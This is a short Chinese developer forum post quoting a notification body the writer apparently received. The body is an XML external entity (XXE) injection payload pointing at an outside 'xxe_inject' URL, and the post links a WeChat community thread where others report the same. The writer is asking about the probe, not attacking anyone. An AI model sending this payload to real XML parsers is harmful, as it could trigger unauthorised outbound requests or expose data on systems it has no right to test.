通知报文如下：

<?xml+version="1.0"+encoding="UTF-8"?>

<!DOCTYPE+foo+[

<!ENTITY+xxe+SYSTEM+"http://tst.qq.com/xxe_inject/bc0f448a9fa963ccebf897f19543188c">]>

<foo><value>&xxe;</value></foo>=

我看也有遇到这种情况的：https://developers.weixin.qq.com/community/develop/doc/0000ee0091cac80474acafa8051800?jumpto=